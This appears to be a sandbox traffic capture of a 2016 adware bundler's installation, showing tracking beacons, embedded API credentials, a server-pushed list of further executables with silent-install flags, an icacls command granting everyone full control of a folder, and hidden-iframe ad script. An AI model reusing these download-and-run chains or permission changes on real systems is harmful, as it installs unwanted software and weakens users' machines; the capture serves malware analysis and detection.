Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}



POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_product_download_start HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c


HTTP/1.1 200 OK

Date: Mon, 20 Jun 2016 14:05:48 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=rljbm550hphee7e79a7efque27; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}



POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_product_download_succeed HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c


HTTP/1.1 200 OK

Date: Mon, 20 Jun 2016 14:05:53 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=42giikqt1lhht9v6t61govequ5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}



POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_product_execute_succeed HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c


HTTP/1.1 200 OK

Date: Mon, 20 Jun 2016 14:05:54 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=70eh31qvtoss83boseru1g1gl7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}



POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_wizzuninstaller_download_start HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c


HTTP/1.1 200 OK

Date: Mon, 20 Jun 2016 14:05:54 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=tmg9hnioa70a8kncrmp9o2os90; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}



POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_wizzuninstaller_download_succeed HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c


HTTP/1.1 200 OK

Date: Mon, 20 Jun 2016 14:05:55 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=g62khqtgl3rs6v5qt1jrp0rpi0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}



POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_done HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c


HTTP/1.1 200 OK

Date: Mon, 20 Jun 2016 14:05:58 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=rftfb4vvdcmhmkmk47h1sf1no0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}


GET /Generic/zgm.php?sid=8100001 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: software-repository.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Mon, 20 Jun 2016 14:06:26 GMT
Content-Type: application/octet-stream
Content-Length: 244224
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=gXvDHtyh.exe

<<< skipped >>>

GET /SysInfo/countup.php?sid=554655542 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: mobilitydata5.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Mon, 20 Jun 2016 14:05:57 GMT
Content-Type: application/octet-stream
Content-Length: 549001
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=1znQuZItQ

<<< skipped >>>

GET /download/3/wizzcaster.exe HTTP/1.1
Host: dl.wizzuniquify.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:05:51 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

<<< skipped >>>

GET /download/3/wizzcasterUninstaller.exe HTTP/1.1

Host: dl.wizzuniquify.com


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:05:51 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

<<< skipped >>>

GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.8.0
Date: Mon, 20 Jun 2016 14:05:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Location: hXXp://livestatscounter.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst=
0......



GET /Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Mon, 20 Jun 2016 14:05:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.32
48d
hXXp://dl.wizzuniquify.com/download/1/spacesoundpro-installer.exe
/S CMI3 3
hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542
hXXp://bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0
hXXp://software-repository.com/Generic/zgm.php?sid=8100001
/install
hXXp://down.eszju.cn/8001/ttwifi.exe
{5DB9279D5A0CB29AA3ED55D055708882}
hXXp://down.hejie123.com/global/AutoTime51477.exe
hXXps://vnl1.izabelcoin.com/vnl1.exe
/PID=1670 /S
hXXp://livestatscounter.com/SysInfo/validator/timer.php
hXXp://livestatscounter.com/Generic/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=CM2
hXXp://dl.samplayeedmed.com/download/dwn/firas/en/setup_mpck_en.exe
/verysilent
hXXp://down.hejie123.com/global/yeaplayer.exe
hXXp://VVV.lvqifa.com/ucni.exe
hXXp://cloudfront.prepucepro.com/download/EasyHotSpot_6db194f1efc3e9e3f.exe
/VERYSILENT clickmein 4
hXXp://b2-31d2.kxcdn.com/B2.exe
hXXp://cpa.downworld.cc/smss.exe
hXXp://d11m2p9mpffp32.cloudfront.net/main/clc_lj.exe
/c=clc /i=301 /s
0

<<< skipped >>>

GET /download/1/wizzproduct.exe HTTP/1.1
Host: dl.we-want-it.xyz
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:05:48 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

<<< skipped >>>

GET /6usnmh78bx79c2vnsdkr4173rqlzjce2i5jm8lb2agyh69dpi9shb1490yo2hx3hhl52youffqvkfkkf?f_sid=1203893 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: evfomo.ru


HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Mon, 20 Jun 2016 14:04:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Access-Control-Allow-Origin: *
Set-Cookie: undefined
Content-Encoding: gzip


POST /api/v1/configuration?username=csdi&password=68b07047-1e8d-47ef-8332-09a2c83ad539 HTTP/1.1
Content-Type: text/xml
Host: wizzcaster.com
Content-Length: 0
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:05:53 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=eyJpdiI6Ikt1NExETTM3RmVDVHN5cVFpY2k0TGc9PSIsInZhbHVlIjoidm5oWXJIY0VRd1ZBbUFOc28yWDEySFV2N1E1aVVYTks3SXhCT2g1NFJpQjZcL2Q4NVROcUYwRXFRd3dUQVNtcFN3RnpSbkpPSXFZUm8yVkJaZ3BkZkJnPT0iLCJtYWMiOiI0MmQ4NjllZjRlY2Q4ZjhhODZjYTk2NDJlNTE5MjE4YWEzMjUyZjQwNzJkMDhlYWZiNDE2N2IyMmM1NTU0Nzk0In0=; expires=Mon, 20-Jun-2016 16:05:53 GMT; Max-Age=7200; path=/; httponly
Content-Length: 135
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/json
{"username":"csdi","api_key":"56f25c2b4eced","wizztracki_user_name":"csdi","wizztracki_api_key":"e3b93cef-8bd4-11e5-8538-0cc47a47968c"}



POST /api/v2/ads?user_name=csdi&api_key=56f25c2b4eced&days_after_install=0 HTTP/1.1

Content-Type: text/xml
Host: wizzcaster.com
Content-Length: 0


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:05:53 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=eyJpdiI6Ilp3eHZRbGtwK2owbmdiQTJVd3hyZGc9PSIsInZhbHVlIjoidjQwS3E2dU10YnFmVXJMMUdwb3FyZ05abDJiVHpJU0FaMXF5aU9rOXZXQkJsM2JtcVAwNDRVZkxwUkM2NEtpcE5BQ0dacVhGVU1VZkFRTzFlK2JzTFE9PSIsIm1hYyI6IjM1MjYwMjc5Yzk3ZDg0N2ViY2M3YzczNzE4NGFjN2VkOTBkN2VmZmRjYjIwMGE3ODRjZjI2ODE3YjRiOGVjZDUifQ==; expires=Mon, 20-Jun-2016 16:05:53 GMT; Max-Age=7200; path=/; httponly
Content-Length: 1210
Content-Type: application/json
{"time_between_prints":"10","print_list":[{"link":"http:\/\/VVV.adnetworkperformance.com\/a\/display.php?r=1203893","campaign_id":"67","campaign_config_id":"404","max_show_per_day_per_user":"30","max_show_per_day_total":"2147483647","ie":"1","chrome":"1","firefox":"1","start_time":"00:00:00","end_time":"00:00:00"},{"link":"http:\/\/VVV.terraclicks.com\/watch?key=ce879c0c81171a2b08325be280eca96a","campaign_id":"120","campaign_config_id":"402","max_show_per_day_per_user":"30","max_show_per_day_total":"2147483647","ie":"1","chrome":"1","firefox":"1","start_time":"00:00:00","end_time":"00:00:00"},{"link":"http:\/\/VVV.xmediaserve.com\/apu.php?n=&zoneid=14335&cb=INSERT_RANDOM_NUMBER_HERE&popunder=1&direct=1","campaign_id":"68","campaign_config_id":"403","max_show_per_day_per_user":"30","max_show_per_day_total":"2147483647","ie":"1","chrome":"1","firefox":"1","start_time":"00:00:00","end_time":"00:00:00"},{"link":"http:\/\/n162adserv.com\/ads?key=0a36c0d49f7b6df6a133b22762c71970&ch=&width=0&height=0","campaign_id":"65","campaign_config_id":"382","max_show_per_day_per_user":"8","max_show_per_day_total":"2147483647","ie":"1","chrome":"1","firefox":"1","start_time":"00:00:00","end_time":"00:00:00"}]}

<<< skipped >>>

POST /csdi/wizzcaster/67 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c


HTTP/1.1 200 OK

Date: Mon, 20 Jun 2016 14:06:03 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=in6as10pk3btep139lnt1gh4m5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}


POST /csdi/wizzcaster/67 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c


HTTP/1.1 200 OK

Date: Mon, 20 Jun 2016 14:06:03 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=5nmm2ujj85c2sarmcprv5arhg2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}


POST /Um7UdXgzvHWLL7R/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: events.datahouse-us.com
Content-Length: 222
Cache-Control: no-cache

{"data":"{\"channel_id\":\"\",\"event_event_id\":\"5857\",\"utm_addition\":\"?ver=20161904_0803_cp&verinst=20160620_1406\",\"guid\":\"75ed9567-aa58-4c8e-a8ea-3cad7c47ab03\",\"browser_name\":\"\"}","table":"event_has_user"}
HTTP/1.1 200 OK
Server: openresty/1.9.7.3
Date: Mon, 20 Jun 2016 14:05:57 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 15
Connection: keep-alive
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
{"Status":"OK"}



POST /Um7UdXgzvHWLL7R/ HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: events.datahouse-us.com
Content-Length: 345
Cache-Control: no-cache

{"data":"{\"channel_id\":\"\",\"event_event_id\":\"5892\",\"utm_addition\":\"?Error execute [icacls.exe "%Program Files%\CleanBrowser" /t /c /grant *S-1-1-0:(OI)(CI)F /inheritance:e] command. error=2&ver=20161904_0803_cp&verinst=20160620_1406\",\"guid\":\"75ed9567-aa58-4c8e-a8ea-3cad7c47ab03\",\"browser_name\":\"\"}","table":"event_has_user"}
HTTP/1.1 400 Bad Request
Server: openresty/1.9.7.3
Date: Mon, 20 Jun 2016 14:05:57 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 47
Connection: keep-alive
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Error decoding request body: Unexpected token C..


POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:05:44 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:05:45 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 191
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.wizzuniquify.com/download/1/spacesoundpro-installer.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:05:46 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 204
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.wizzuniquify.com/download/1/spacesoundpro-installer.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:05:57 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 184
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:05:58 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 197
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:06:09 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 346
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:06:16 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:06:26 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 184
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://software-repository.com/Generic/zgm.php?sid=8100001&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:06:27 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 197
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://software-repository.com/Generic/zgm.php?sid=8100001&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:06:37 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}


GET /a/display.php?r=1203893 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.adnetworkperformance.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: openresty
Date: Mon, 20 Jun 2016 14:06:04 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-RevProc-1: ca4b836c93e47223f16bb6e2704eddf0 = ok
980..<!DOCTYPE html>.<html>.<head>.    <script la
nguage="javascript">. if (window.opener) {. windo
w.opener.focus();. }. </script>.</head>.<body
>.<script type="text/javascript">. ..(function(d) {....var
advpix68343=d.createElement('iframe');....advpix68343.src='//VVV.adne
tworkperformance.com/pix.html';....advpix68343.frameBorder=0;....advpi
x68343.seamless='seamless';....advpix68343.allowTransparency = 'true';
....advpix68343.setAttribute('style','position:absolute;top:-1000px;le
ft:-1000px;width:1px;height:1px;visibility:hidden;display:none;border:
medium none;background-color:transparent;');.....function appendToBody
() {.....var body=undefined;.....if (typeof d.body != 'undefined') {..
....body = d.body;.....}.....else {......body = d.getElementsByTagName
('body')[0];.....}.....if (!body) {......setTimeout(appendToBody, 10);
.....}.....else {......body.appendChild(advpix68343);.....}....}....ap
pendToBody();...})(document);.. function getMetaContent(name) {.
try {. var meta = window.top.document.getElementsByTag
Name('meta');. for (var i = 0; i < meta.length; i ) {.
if (meta[i].hasAttribute('name') && meta[i].getAttribut
e('name').toLowerCase() === name) {. var info = met
a[i].getAttribute('content');. var indexToCut = Mat
h.max(info.indexOf(' ', 256), info.indexOf(',', 256));.
if (indexToCut > 384 || indexToCut < 20) {.

<<< skipped >>>

GET /a/display.php?r=1203893&treqn=863003326&runauction=1&crr=f5829f18bd66e0f9a58a,EmRyUib62556aa2956a48838c36&ctbust=0.12173383931552406&cbtitle=&cbiframe=0&cbdescription=null&cbkeywords=null HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.adnetworkperformance.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: openresty
Date: Mon, 20 Jun 2016 14:06:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: acnetwork=c2f260da5767f84c7b4d97bac7; expires=Wed, 30-Dec-2037 23:00:00 GMT; Max-Age=679395236; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding
X-Robots-Tag: noindex
Cache-Control: no-store, no-cache, no-transform, must-revalidate, max-age=0, post-check=0, pre-check=0
Pragma: no-cache
X-RevProc-1: b932d130ec013db521bedf9ec6e2637a = ok
Content-Encoding: gzip

<<< skipped >>>

